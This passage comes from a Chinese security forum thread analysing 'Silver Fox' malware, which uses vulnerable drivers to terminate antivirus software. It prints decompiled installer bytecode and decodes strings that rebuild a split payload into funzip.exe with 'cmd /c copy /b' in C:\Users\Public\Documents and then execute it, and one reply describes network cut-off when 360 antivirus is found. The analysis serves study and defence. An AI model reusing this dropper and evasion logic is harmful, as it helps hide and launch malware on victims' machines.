首页| 论坛| 搜索| 消息
>〖系统安全〗
主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
z3960发表于 2026-02-21 07:49
n Var11[7], S32(120)assign Var11[8], S32(101)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8assign Var6, Var8pop ; StackCount = 7pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var6pushvar Var8 ; StackCount = 10call FILEEXISTSpop ; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_47cdpushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(0)pushtype S32 ; StackCount = 11assign Var11, S32(5)pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype S32 ; StackCount = 15assign Var15, S32(0)pushvar Var14 ; StackCount = 16call SETARRAYLENGTHpop ; StackCount = 15pop ; StackCount = 14assign Var13, Var14pop ; StackCount = 13pushvar Var12 ; StackCount = 14call STRFROMCODEpop ; StackCount = 13pop ; StackCount = 12pushtype UnicodeString_2 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(0)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14pushvar Var13 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype UnicodeString_2 ; StackCount = 14assign Var14, Var6pushvar Var8 ; StackCount = 15call EXECpop ; StackCount = 14pop ; StackCount = 13pop ; StackCount = 12pop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7loc_47cd:pushtype WideString ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(25)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(67)assign Var11[1], S32(58)assign Var11[2], S32(92)assign Var11[3], S32(85)assign Var11[4], S32(115)assign Var11[5], S32(101)assign Var11[6], S32(114)assign Var11[7], S32(115)assign Var11[8], S32(92)assign Var11[9], S32(80)assign Var11[10], S32(117)assign Var11[11], S32(98)assign Var11[12], S32(108)assign Var11[13], S32(105)assign Var11[14], S32(99)assign Var11[15], S32(92)assign Var11[16], S32(68)assign Var11[17], S32(111)assign Var11[18], S32(99)assign Var11[19], S32(117)assign Var11[20], S32(109)assign Var11[21], S32(101)assign Var11[22], S32(110)assign Var11[23], S32(116)assign Var11[24], S32(115)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(8)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(92)assign Var11[1], S32(109)assign Var11[2], S32(101)assign Var11[3], S32(110)assign Var11[4], S32(46)assign Var11[5], S32(101)assign Var11[6], S32(120)assign Var11[7], S32(101)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8assign Var5, Var8pop ; StackCount = 7pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var5pushvar Var8 ; StackCount = 10call FILEEXISTSpop ; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_4c1apushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(0)pushtype S32 ; StackCount = 11assign Var11, S32(0)pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype S32 ; StackCount = 15assign Var15, S32(0)pushvar Var14 ; StackCount = 16call SETARRAYLENGTHpop ; StackCount = 15pop ; StackCount = 14assign Var13, Var14pop ; StackCount = 13pushvar Var12 ; StackCount = 14call STRFROMCODEpop ; StackCount = 13pop ; StackCount = 12pushtype UnicodeString_2 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(0)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14pushvar Var13 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype UnicodeString_2 ; StackCount = 14assign Var14, Var5pushvar Var8 ; StackCount = 15call EXECpop ; StackCount = 14pop ; StackCount = 13pop ; StackCount = 12pop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7loc_4c1a:ret
这个函数包含多个ASCII码数组,用于构建字符串并执行各种操作。
以下是所有数组的ASCII码还原结果及其对应的字符串:
第一个数组(12字节)ASCII码:47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 34字符串:"/c copy /b ""
第二个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"
第三个数组(13字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 51, 34, 32, 43, 32, 34字符串:"unzip.3" + ""
第四个数组(11字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 50, 34, 32, 34字符串:"unzip.2" ""
第五个数组(21字节)ASCII码:92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101, 34, 32, 38, 38, 32, 100, 101, 108, 32, 34字符串:"funzip.exe" && del ""
第六个数组(9字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 50, 34字符串:"unzip.2""
第七个数组(7字节)ASCII码:99, 109, 100, 46, 101, 120, 101字符串:"cmd.exe"
第八个数组(51字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68,
下一页上一页  (11/23)
回帖(7):
7 # hanxiao129
02-22 20:31
看来很不错的
6 # hanxiao129
02-22 20:30
不错的银狐
5 # hanxiao129
02-22 20:30
感谢楼主分享
4 # huwg
02-21 16:56
谢谢分享
3 # huwg
02-21 16:56
了解一下
2 # huwg
02-21 16:56
来看看看
1 # z3960
02-21 07:50
该函数会检测360主防进程——若存在,则执行断网,具体如下:该函数会调用代码中的“IS360PROCES ..

全部回帖(7)»
最新回帖
收藏本帖
发新帖